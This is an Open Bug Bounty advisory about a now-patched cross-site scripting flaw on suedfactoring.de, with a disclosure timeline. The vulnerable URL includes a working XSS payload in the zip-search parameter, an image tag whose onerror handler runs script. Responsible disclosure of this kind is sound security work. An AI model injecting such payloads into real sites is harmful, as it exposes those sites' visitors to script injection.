suedfactoring.de XSS vulnerability

2017-03-29T20:09:00
ID OBB:221940
Type openbugbounty
Reporter SecuNinja
Modified 2017-11-25T19:20:00

Description

Vulnerable URL:
http://www.suedfactoring.de/ansprechpartner/plz-suche/?tx_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40extension%5D=MqContactsearchSuedleasing&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40vendor%5D=MOSAIQ&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40controller%5D=Contact&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40action%5D=searchMask&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5Barguments%5D=YTowOnt9445ff3c2f92461be077e96183cc305ef9330b7ca&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__referrer%5D%5B%40request%5D=a%3A4%3A%7Bs%3A10%3A%22%40extension%22%3Bs%3A26%3A%22MqContactsearchSuedleasing%22%3Bs%3A11%3A%22%40controller%22%3Bs%3A7%3A%22Contact%22%3Bs%3A7%3A%22%40action%22%3Bs%3A10%3A%22searchMask%22%3Bs%3A7%3A%22%40vendor%22%3Bs%3A6%3A%22MOSAIQ%22%3B%7Df04a72578ff2b5705e20438db75c1253e81f7261&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5B__trustedProperties%5D=a%3A2%3A%7Bs%3A9%3A%22zipSearch%22%3Ba%3A1%3A%7Bs%3A3%3A%22zip%22%3Bi%3A1%3B%7Ds%3A6%3A%22search%22%3Bi%3A1%3B%7D51c936c7da1c83c11cba936403c9d901fa4c4305&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5BzipSearch%5D%5Bzip%5D=a%3E%27%3E%22%3Etr%3Ci%3Ep%3Cimg+src%3Dy+onerror%3Dprompt%28%2Fopenbugbounty%2F%29%3E&tx;_mqcontactsearchsuedleasing_mqcontactsearchsuedleasing%5Bsearch%5D=
Details:

Description| Value
---|---
Patched:| Yes, at 25.11.2017
Latest check for patch:| 25.11.2017 19:20 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 15773749
VIP website status:| No
Check suedfactoring.de SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 March, 2017 20:09 GMT
Generic security notifications sent to website owner| 29 March, 2017 20:12 GMT
Vulnerability details disclosed by researcher| 26 April, 2017 20:16 GMT
Vulnerability patched by the website owner| 25 November, 2017 19:20 GMT